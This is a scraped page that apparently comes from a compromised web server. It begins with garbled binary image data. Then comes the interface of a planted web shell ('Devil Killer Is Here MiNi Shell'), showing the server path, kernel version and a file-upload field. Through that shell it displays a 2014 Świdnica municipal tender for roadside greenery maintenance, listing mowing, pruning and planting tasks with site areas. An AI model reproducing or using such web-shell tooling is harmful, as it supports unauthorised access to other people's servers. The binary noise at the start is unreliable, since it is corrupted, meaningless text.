JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/252362-N-2014.html

<p class="kh_header"><b>Świdnica: Pielęgnacja zieleni przyulicznej oraz usługi sadzenia roślin w pasach drogowych dróg gminnych w granicach administracyjnych miasta Świdnica</b><br>
<b>Numer ogłoszenia: 252362 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja zieleni przyulicznej oraz usługi sadzenia roślin w pasach drogowych dróg gminnych w granicach administracyjnych miasta Świdnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pielęgnacja zieleni przyulicznej oraz usługi sadzenia roślin w pasach drogowych dróg gminnych w granicach administracyjnych miasta Świdnica.       

3.3 Wspólny Słownik Zamówień CPV:
Główny przedmiot:  77.31.00.00-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych.

3.4  Zakres zamówienia obejmuje:

3.4.1 Zadanie A  Utrzymanie zieleni niskiej i średniej oraz usługi sadzenia roślin,

3.4.2 Zadanie  B Utrzymanie zieleni wysokiej.


ROZDZIAŁ 23  Szczegółowy opis przedmiotu zamówienia                     
Zadanie A Utrzymanie zieleni niskiej i średniej oraz usługi sadzenia roślin
1. Zadanie A1 podstawowe prace pielęgnacyjne i porządkowe.
1). Mechaniczne koszenie  trawników wraz z wygrabieniem pokosu i wywozem biomasy 
a) Mechaniczne  koszenie 4  razy w sezonie trawników na powierzchni  46 142 m2 
Wykaz terenów do koszenia  będzie podawał Zamawiający. 
Na żądanie Zamawiającego maksymalny czas wykonania jednokrotnego koszenia z wygrabieniem pokosu i wywozem biomasy nie może wynosić więcej niż 4 dni.
 b) Terminy koszeń będą podawane w miesięcznych harmonogramach prac. 
c) Koszenie trawników wraz z wygrabieniem skoszonej trawy i wywozem biomasy obejmuje :  
ścięcie  i  wygrabienie  trawy,  zamiatanie chodnika i jezdni ze  ściętej  trawy  natychmiast  po  koszeniu,  wywóz biomasy najpóźniej w drugim dniu po skoszeniu.
2) Mechaniczne koszenie trawników bez grabienia i wywozu biomasy
Mechaniczne koszenie 4 razy w sezonie trawników na  powierzchni 34 002 m2.  Wykaz  terenów
do koszenia bez grabienia i wywozu biomasy będzie podawał Zamawiający.
Koszenie obejmuje również zamiecenie chodnika i jezdni ze ściętej trawy natychmiast po skoszeniu
Na żądanie Zamawiającego maksymalny czas wykonania jednokrotnego koszenia nie może wynosić więcej niż 7 dni.

3) Utrzymanie czystości terenów zielonych  w ramach ryczałtu letniego polegające na: 

a)  bieżącym  usuwaniu   wszelkich odpadów komunalnych ( kubki, folie, papiery itp.) z trawników i zieleńców  na powierzchni  82 946 m2  wraz  z wywozem odpadów do instalacji przetwarzania odpadów. Wykaz terenów do oczyszczania zawiera pkt. 1 i 2  Wykazu terenów do utrzymania w ramach  podstawowych prac pielęgnacyjnych - zadanie A1 ( załącznik nr 2 do umowy).
b)  bieżącym  usuwaniu  wszelkich odpadów komunalnych ( kubki, folie, papiery itp. )  z chodników i placów na powierzchni 19 646 m2 wraz z wywozem odpadów do instalacji przetwarzania odpadów.
Wykaz chodników i placów do oczyszczania zawiera pkt. 3 Wykazu terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych - zadanie A1( załącznik nr 2 do umowy ).
c) ustawieniu na terenach zielonych 32 szt. koszy ulicznych stanowiących własność Wykonawcy, systematycznym ( nie powodującym przepełnienia kosza ) opróżnianiu 32 szt. koszy ulicznych o pojemności minimum  60 l  wraz z wywozem odpadów  do instalacji przetwarzania odpadów. Utrzymanie koszy w czystości i w stanie zdatnym do eksploatacji. Lokalizację koszy zawiera pkt. 6 Wykazu terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych - zadanie A1( załącznik nr 2 do umowy ).
Termin obowiązywania ryczałtu letniego (od dnia 16 sierpnia 2014 r. do 30 listopada 2014 r.i od 01 kwietnia 2015 r. do 15.06.2015 r.)
4 ) Utrzymanie czystości terenów zielonych  w ramach ryczałtu zimowego  polegające na: 
a)   bieżącym  usuwaniu   wszelkich odpadów komunalnych ( kubki, folie, papiery itp.) z trawników i zieleńców  na powierzchni 82 946 m2  wraz  z wywozem odpadów do instalacji przetwarzania odpadów. Wykaz terenów do oczyszczania zawiera pkt. 1 i 2 wykazu terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych - zadanie A1 ( załącznik nr 2 do umowy ).

b) ustawieniu na terenach zielonych 32 szt. koszy ulicznych stanowiących własność Wykonawcy,
systematycznym ( nie powodującym przepełnienia kosza ) opróżnianiu 32 szt. koszy ulicznych o pojemności minimum 60 l będących własnością Wykonawcy  wraz z wywozem odpadów do instalacji przetwarzania odpadów. Utrzymanie koszy w czystości i w stanie zdatnym do eksploatacji.
Termin obowiązywania ryczałtu zimowego  (od 01 grudnia 2014 r. do 31 marca 2015 r.)  
5)  Cięcie formujące żywopłoty  
 Trzykrotne cięcie  żywopłotów ( formowanie kształtu ) o powierzchni 1558 m2, spulchnienie ziemi, odchwaszczenie żywopłotów, zgrabienie ścinek i chwastów oraz wywóz biomasy.
Wykaz lokalizacji żywopłotów zawiera pkt .4 Wykazu terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych - zadanie A1 ( załącznik nr 2 do umowy ). 
Maksymalny czas wykonania jednego cięcia żywopłotu wraz ze spulchnianiem ziemi,
odchwaszczaniem i usunięciem biomasy wynosi 10 dni.
Wywóz biomasy winien odbywać się sukcesywnie , lecz nie później niż w następnym dniu po zakończeniu zabiegu w pasie drogowym danej ulicy.
6)  Jednokrotny oprysk środkiem chwastobójczym chodników i placów  o łącznej powierzchni 4 995 m2
7)  Zamiatanie chodników o łącznej powierzchni 56 080 m2  
Zamiatanie  chodników  polega na usunięciu z nawierzchni  piasku, psich odchodów, liści, opadłych owoców wraz z wywozem odpadów do instalacji przetwarzania odpadów. Wykaz chodników do zamiatania będzie podawał Zamawiający.
8) Usuwanie dzikich wysypisk śmieci na terenach zielonych  w ilości 68 m3   wraz z  przekazaniem odpadów podmiotowi uprawnionemu do ich zagospodarowania.
 Wykonawca zobowiązany jest  zawiadomić Zamawiającego o zlokalizowaniu dzikiego wysypiska śmieci. Wykonawca zobowiązany jest  wykonać na tę okoliczność dokumentację fotograficzną.
Zamawiający wymaga usunięcia dzikiego wysypiska w terminie: do 2 dni od daty otrzymania polecenia.
Jednocześnie uprawnionymi do zobowiązania Wykonawcy w przedmiocie ww działań są przedstawiciele Referatu  Dróg i Straży Miejskiej.
9) Jednokrotny  oprysk środkiem chwastobójczym   powierzchni  przy znakach, lampach,  barierkach, wysepkach. Łączna powierzchnia do wykonania oprysku - 6000 m2

Uwaga: poz.6 i 9 
Wykonawca przed przystąpieniem do wykonywania prac zobowiązany jest do zapoznania się i stosowania obowiązujących  przepisów w zakresie używania środków chemicznych chwastobójczych. 

2. Zadanie A2 Usługi sadzenia roślin oraz inne prace wykonywane w zakresie utrzymania zieleni niskiej i średniej
10) Jednokrotne mechaniczne usunięcie  kęp traw, chwastów przy znakach , lampach, barierkach, drzewach  na powierzchni 2025 m2 wraz z wywozem biomasy. 
11) Usuniecie darni z chodników na powierzchni 3850 m2 wraz z wywozem biomasy
Ręczne zdjęcie darni z powierzchni chodników, złożenie w pryzmy
12) Czterokrotne plewienie    nasadzeń  krzewów ozdobnych na zieleńcach ( z wyjątkiem krzewów  żywopłotowych ) na powierzchni  3491 m2 wraz z wywozem biomasy, nie później niż w następnym dniu po zakończeniu zabiegu.
Wykaz lokalizacji zieleńców zawiera pkt. 5 Wykazu terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych  - zadanie A1 ( załącznik nr 2 do umowy )
13) Grabienie wiosenne  liści na terenach zielonych o łącznej powierzchni 18 581 m2.
Grabienie wiosenne liści z terenów zielonych  wraz z  wywozem biomasy.
Wywóz biomasy  winien odbywać się sukcesywnie lecz nie później niż w następnym dniu po zakończeniu grabienia danego terenu.
14) Grabienie jesienne  liści na terenach zielonych o łącznej powierzchni 90 735 m2.
Grabienie jesienne liści z terenów zielonych  wraz z  wywozem biomasy.
Wywóz biomasy  winien odbywać się sukcesywnie lecz nie później niż w następnym dniu po zakończeniu grabienia danego terenu.
15) Cięcie odmładzające  371 sztuk krzewów ozdobnych raz w roku  
Cięcie odmładzające krzewów ozdobnych o średnicy korony do 2 m 
Wywóz biomasy w dniu wykonywania zabiegu. 
16) Nasadzenia  50 szt. drzew ozdobnych liściastych ( materiał Wykonawcy ) 
Nasadzenia  50 sztuk 10-letnich szkółkowanych drzew ozdobnych liściastych z bryłą korzeniową o obwodzie pnia 20-25cm, z zaprawą dołów w gruncie kat. III, założenie osłony z pali drewnianych.
Dwukrotne podlanie wysadzonych drzew. 
17) Nasadzenia 1600 sztuk  krzewów żywopłotowych ( irga lucida ) w ilości 8 szt- mb ( materiał Wykonawcy ) 
Nasadzenia 1600 sztuk krzewów żywopłotowych ( irga lucida ) w ilości 8 szt-mb na długości 200 mb w rowach o szerokości do 45 cm wraz z zaprawą rowów do połowy głębokości w gruncie kat. III.
 Dwukrotne podlanie wysadzonych krzewów. 

18) Przygotowanie do obsady kwiatowej:  rondo Orląt Lwowskich - powierzchnia 36 m2, Pl. Wolności 
-  powierzchnia 97 m2 Wykonanie obsady kwiatowej  na zieleńcach  o powierzchni 72 m2 ( materiał Wykonawcy ) 
Przygotowanie  terenu pod obsadzenia  kwiatowe wiosenne  - 133 m2
Przygotowanie terenu w gruncie kat. III z uzupełnieniem gleby rodzimej warstwą 
ziemi o grubości 5 cm.
Wykonanie obsady wiosennej ( żeniszek, szałwia, aksamitka, begonia sempenflores ) na zieleńcach o powierzchni -133 m2 w ilości 33 szt/m2
Dwukrotne podlanie wysadzonych kwiatów. 

19)  Przygotowanie terenu  ronda Orląt Lwowskich o powierzchni 36 m2 pod jesienne nasadzenia cebul tulipanów i narcyzów. Wysadzenie na zieleńcu cebul tulipanów, narcyzów w ilości 2900 szt.( materiał Wykonawcy )
Przygotowanie terenu pod obsadzenia kwiatowe w gruncie kat III z uzupełnieniem gleby rodzimej
warstwą ziemi o grubości 5 cm. Obsadzenie zieleńca roślinami cebulkowymi w ilości 2900 szt.

20) Sadzenie krzewów liściastych form naturalnych w ilości 30 szt. i krzewów iglastych  w ilości 20 szt. wraz z zaprawą dołów do połowy głębokości i podlaniem krzewów ( materiał Wykonawcy )

Sadzenie krzewów liściastych form naturalnych w ilości 30 szt. na terenie płaskim w gruncie kat. III
bez zaprawy dołów śr.-głębok. 0,3 m.
Sadzenie krzewów iglastych w ilości 20 szt. na terenie płaskim w gruncie kat. III
z zaprawą dołów śr.-głębok. 0,5 m.
Dwukrotne podlanie wysadzonych krzewów

21)  Podlewanie  kwiatów rabatowych  na zieleńcach: rondo Orląt Lwowskich - powierzchnia 36 m2 i  Plac Wolności - powierzchnia 97 m2 ( 12 razy w sezonie )
Podlewanie będzie wykonywane na polecenie Zamawiającego.

22) Podlewanie nasadzeń młodych drzew i krzewów ( 3 razy w sezonie )
Drzewa w ilości - 50 sztuk 
Powierzchnia nasadzeń krzewów ozdobnych - 400 m2 
Podlewanie będzie wykonywane na polecenie Zamawiającego.
23) Wykonanie trawników dywanowych siewem na powierzchni 200 m2 w gruncie III kategorii z nawożeniem
24) Usuwanie odrostów na drzewach  starszych w ilości 217 sztuk wraz z załadunkiem i wywozem biomasy.
Wywóz biomasy w dniu wykonywania zabiegu. 
Uwaga; dotyczy pkt . 21 i 22
Pobór wody do podlewania ze zbiorników lub miejsc poboru wskazanych przez Zamawiającego.
Cena wody jest ujęta w cenie podlewania.


Zadanie B - Utrzymanie zieleni wysokiej 

25) Usuwanie drzew w ilości 50 szt. o średnicy < 20 cm wraz z wykarczowaniem karpiny. Załadunek i wywóz biomasy.
Wywóz biomasy w dniu wykonywania zabiegu.
Miejsce po karczowaniu zasypać ziemią urodzajną.

26) Usunięcie ( z użyciem podnośnika  koszowego ) drzew  w ilości 30 sztuk  o średnicy pnia  21-30 cm z wykarczowaniem karpiny  
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Miejsce po karczowaniu zasypać ziemią urodzajną.
27) Usunięcie ( z użyciem podnośnika  koszowego ) drzew  w ilości 39 sztuk  o średnicy pnia  31-40 cm z wykarczowaniem karpiny. Załadunek i wywóz biomasy. 
Wywóz biomasy w dniu wykonywania zabiegu.
Miejsce po karczowaniu zasypać ziemią urodzajną.
28) Usunięcie ( z użyciem podnośnika koszowego ) drzew  w ilości 20 sztuk o średnicy  pnia 41-65 cm bez karczowania karpiny. Załadunek i wywóz biomasy.
Wywóz biomasy w dniu wykonywania zabiegu. 
29) Usunięcie ( z użyciem podnośnika koszowego ) drzew  w ilości 20 sztuk o średnicy  pnia 41-65 cm wraz z karczowaniem karpiny. Załadunek i wywóz biomasy.
Wywóz biomasy w dniu wykonywania zabiegu. 
Miejsce  po karczowaniu zasypać ziemią urodzajną.
30) Cięcie sanitarno- korekcyjne całości korony drzew  ( z użyciem podnośnika koszowego) w ilości 50 sztuk o średnicy pnia 21-30 cm 
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie miejsc cięć powłoką ochronną. 
31) Cięcie sanitarno- korekcyjne całości korony drzew ( z użyciem podnośnika koszowego) w ilości 150 sztuk o średnicy pnia 31-40 cm 
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie miejsc cięć powłoką ochronną. 
32) Cięcie sanitarne 59 sztuk drzew( z użyciem drabin )o średnicy pnia 21-30 cm
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie miejsc cięć powłoką ochronną. 
33) Cięcie sanitarno -korekcyjne  120 sztuk drzew  ( z użyciem podnośnika koszowego ) o średnicy  pnia powyżej  41 cm 
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie ran powłoką ochronną. 
 34) Podkrzesanie  koron  150 sztuk drzew starszych o średnicy pnia 31-40 cm.
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie ran powłoką ochronną.  
35) Przycięcie gałęzi 98 sztuk drzew starszych o średnicy pni powyżej 41 cm  w celu odsłonięcia znaków drogowych  i  sygnalizacji świetlnej, 
Załadunek i wywóz biomasy w dniu wykonywania zabiegu.
Zabezpieczenie  ran powłoką ochronną.
36) Przedmiar robót
Wymieniony przedmiar prac obejmuje planowane usługi do wykonania w trakcie obowiązywania umowy 
37) Zagospodarowanie odpadów
Wykonawca  ma obowiązek gospodarowania powstałymi podczas realizacji zamówienia odpadami  zgodnie z ustawą  z   dnia 14.12.2012 r. o odpadach ( Dz.U z 2013 r. poz. 21 )   i  ustawą  o utrzymaniu czystości i porządku w  gminach ( Dz.U z 2012 r. poz. 391 z póżn. zm.)
Uwaga: 
Materiał  z  drzew  zaatakowanych  przez  wirusy  i bakterie  należy  spalić w miejscu wskazanym przez Zamawiającego  po  uprzednim zawiadomieniu Straży Pożarnej.
Rozdział 24  Wykaz terenów do utrzymania w ramach podstawowych prac pielęgnacyjnych - zadanie A1 

1.Wykaz terenów zielonych do koszenia

L.p.Lokalizacja	Powierzchnia
1)Aleja Goplany	1988 m2
2)Aleja Goplany - zieleńce pomiędzy Aleją Goplany, a alejką w kierunku ul. Bobrzańskiej	702 m2
3)Bokserska - lewa str. od ul. Sportowej 	88 m2
4)Dąbrowskiego 10-16 - trawnik ( teren działki nr 2/4 dr i część działki nr 11/2 )	350 m2
5)Długa 72 - trawnik przed Urzędem Miar	120 m2 
6)Dworcowa-zieleńce w pasie drogi	120 m2
7)Francuska - pas zieleni po prawej stronie od Jodłowej do budynku nr 9	50 m2
8)Hetmańska - trzy zieleńce przy drzewach	34 m2
9)Jałowcowa - pas zieleni przy murze od budynku nr 20 do garaży	35 m2
10)Jodłowa-Westerplatte - skrzyżowanie - zieleniec z żywopłotem	200 m2
11)K. Wielkiego - lewa strona od ronda do ul. Andersa	8842 m2
12)K. Wielkiego - pas zieleni przed posesją K.Wielkiego 2	100 m2
13)K. Wielkiego - prawa strona od ronda do posesji  firmy Colgate	7923 m2
14)K. Wielkiego - przy ogrodzeniu kościoła od ul. B.Śmiałego do posesji firmy Colgate	200 m2
15)K.Wielkiego - teren naprzeciwko firmy Colgate, pomiędzy parkingiem dla tirów, a jezdnią	7044 m2
16)K.Wielkiego-Pobożnego-Stęczyńskiego - skrzyżowanie	516 m2
17)Kasztanowa - pas zieleni po prawej stronie od Westerplatte	290 m2
18)Kilińskiego-Rolnicza - wysepka	20 m2
19)Klonowa - wysepka w pobliżu budynku Klonowa 28 - 34	50 m2
20)Kolejowa - zieleńce w pasie drogi	115 m2 
21)Kolejowa - teren dworca autobusowego	1880 m2
22)Konopnickiej - zieleniec koło przychodni	80 m2
23)Kopernika - od Kliczkowskiej do Kilińskiego - lewa strona drogi	230 m2
24)Kopernika - od Kliczkowskiej do Okrężnej - prawa strona drogi (bez zieleńca w pobliżu Kołłątaja )	620 m2
25)Kopernika - trawnik od mostu na rzece Bystrzyca do Kliczkowskiej - lewa strona drogi 	175 m2
26)Kosynierów - lewa strona od Hetmańskiej do Pileckiego	718 m2
27)Kosynierów - pas zieleni pod murem - prawa strona od ul. Hetmańskiej	440 m2
28)Krzywoustego - od B. Śmiałego do Stęczyńskiego - pobocze	695 m2
29)Krzywoustego 9-15 - pas zieleni za chodnikiem	53 m2
30)Krzywoustego 9-15 -  pas zieleni wzdłuż boiska	114 m2
31)Ks. Agnieszki - trawnik przed Szkołą Ekonomiczną	108 m2
32)Ks. Jadwigi Śląskiej - pas zieleni przy murku wzdłuż pawilonów	40 m2
33)Langiewicza - obie str. drogi gruntowej od Prądzyńskiego do ogrodów działkowych	140 m2
1)Lipowa - pas zieleni po prawej stronie od Śląskiej do parku	150 m2
2)Łukasińskiego -  teren zielony na parkingu	3332 m2
3)Łukasińskiego - teren zielony między jezdnią, a chodnikiem wzdłuż parkingu	148 m2
4)Łukasińskiego-Esperantystów - skrzyżowanie - część zieleńca z lipami	405 m2
5)Marcinkowskiego -  trawniki na parkingu	1100 m2
6)Marcinkowskiego - skarpa koło szkoły	360 m2
7)Marcinkowskiego - wysepki koło Tesco	20 m2
8)Matejki - prawa strona od Garbarskiej	80 m2
9)Miarki - przejście pomiędzy budynkiem nr 18, a budynkiem nr 20 (działka nr 92-1)	250 m2
10)Mieszka - działka nr 60-3, 60-7, 59-1 (teren przy budynkach 17 A,B,C,D)	1230 m2
11)Miłego Dnia - pas zieleni za chodnikiem wzdłuż rzeki	2084 m2
12)Miłego Dnia - skarpa w pobliżu Szkoły Hotelarskiej	88 m2
13)Miłego Dnia - teren zielony przed Szkołą Hotelarską	111 m2
14)Niecała-Fieldorfa - skrzyżowanie	14 m2
15)Ofiar Oświęcimskich - koło Aldi	80 m2
16)Ofiar Oświęcimskich - trojkąt koło Mc Donald vis a vis ul. Sybiraków	210 m2
17)Ofiar Oświęcimskich - wzdłuż ogrodzenia Mc Donald	40 m2
18)Paderewskiego - teren zielony za parkingiem ( zaplecze budynków Polna Droga )	560 m2
19)Paderewskiego - zaplecze posesji Kusocińskiego	210 m2
20)Parkowa - wysepka w pobliżu posesji Parkowa 8	100 m2
21)Pileckiego - teren zielony z klonami vis a vis szkoły	665 m2
22)Pionierów - wysepka przy rondzie	18 m2
23)Piotra Skargi - pas zieleni po lewej stronie od ul. Rolniczej	164 m2
24)Plac Kombatantów - teren zielony przy bocznej ścianie budynku Carefour wraz z murkiem	177 m2 
25)Plac Kombatantów - trawniki przy parkingu	383 m2
26)Pobożnego-Stęczyńskiego-K.Wielkiego - wysepki	141 m2
27)Polna Droga - alejka między zalewem Witoszówka, a ul. Słowiańską	2835 m2
28)Polna Droga - alejka od ul. Bobrzańskiej do tamy wraz z łącznikiem	680 m2  
29)Prądzyńskiego - pas zieleni od posesji Langiewicza 1 do bramy kościoła - prawa strona drogi	320 m2
30)Przedwiośnie -Zacisze - skrzyżowanie	80 m2
31)Rolnicza - od hurtowni Polmet na długości ogrodzenia ciepłowni ŚFUP	390 m2
32)Roweckiego-Fieldorfa - skrzyżowanie	38 m2
33)Równa - pas zieleni koło II LO i Zakładu Energetycznego	356 m2
34)Równa - wzdłuż posesji Zespołu Szkół Hotelarskich	220 m2
35)Równa- Mieszka - po stronie Szkoły Hotelarskiej - zieleniec przy ogrodzeniu i jezdni	308 m2 
36)Sikorskiego - od Słowackiego do posesji Sikorskiego 23 - obie strony drogi	788 m2
37)Słowiańska -  pas zieleni za ścieżką rowerową	360 m2
38)Słowiańska - lewa strona od Śląskiej do skarpy	130 m2
39)Sportowa - od posesji Sportowa 3 do ul. Bokserskiej - lewa strona drogi	311 m2
40)Stalowa - teren zielony przylegający do posesji firmy Eurofoam(część działki nr 1490)	266 m2
41)Stawki - pas zieleni wzdłuż ogrodzenia	500 m2
42)Stęczyńskiego - trawniki po obu stronach drogi	11700 m2
43)Szpitalna - zieleniec przy murze vis a vis Teatralnej	270 m2
44)Śląska - działka nr 89 (teren między ul. Zieloną, a Przyjaźni)	1100 m2
78)Śląska - lewa strona od ronda do Westerplatte	3336 m2 
79)Śląska - prawa strona od Sportowej do Westerplatte	762 m2
80)Śląska - skarpa wzdłuż torów kolejowych od ogrodzenia cmentarza do Przyjaźni	650 m2
81)Śląska - zieleniec Śląska -Sadowa wraz z pasem przyulicznym do ul. Przyjaźni	1650 m2
82)Śląska -Pionierów - skrzyżowanie - trawnik na rondzie	70 m2
83)Trzeboszańska - ciąg pieszy Trzeboszańska 39 - Ślężańska	116 m2
84)Wałbrzyska-Polna Droga - zieleniec przy skrzyżowaniu	1 000 m2
85)Waryńskiego - pas zieleni przy ciągu pieszym ul. Waryńskiego naprzeciwko budynku Waryńskiego 51	68 m2
86)Webera-Zamenhofa - skrzyżowanie - wysepka	20 m2
87)Wesoła - trawniki	260 m2 
88)Westerplatte - koło fabryki Mebli	60 m2
89)Westerplatte -  zieleniec w pobliżu Nowoczesnej Gospodyni	200 m2
90)Westerplatte - nowo- założone zieleńce po stronie dawnego szpitala	494 m2
91)Westerplatte - trawnik przy parkingu galerii	870 m2
92)Westerplatte - zieleniec przy dawnym młynie	300 m2
93)Westerplatte - zieleniec przy posesji Westerplatte 37-39	112 m2
94)Wodna - pas zieleni od Mieszka do posesji Wodna 4- lewa strona drogi	140 m2
95)Wodna - pas zieleni przy moście	500 m2
96)Wodna - trawnik na zieleńcach koło mostu	823 m2
97)Wodna - trawniki po obu stronach drogi od Mieszka do ul. Nadbrzeżnej	340 m2
98)Wrzosowa - pas zieleni vis a vis posesji Wrzosowa 7	45 m2
99)Wyszyńskiego - skarpa koło parkingu	188 m2
100)Zamenhofa  - działka nr 35-1- teren zielony za sklepem Awans	75 m2
101)Zamenhofa 1-3-5 - działka nr 3	300 m2
102)Zamenhofa 1a-b, 3a-b, 5 - działka nr 4		693 m2
103)Zamenhofa 48-50 - zieleniec z topolami przy ogrodzeniu przedszkola	220 m2 
 RAZEM 80 144 m2 
2. Wykaz urządzonych zieleńców do oczyszczania w ramach ryczałtu letniego i zimowego
Drogi gminne

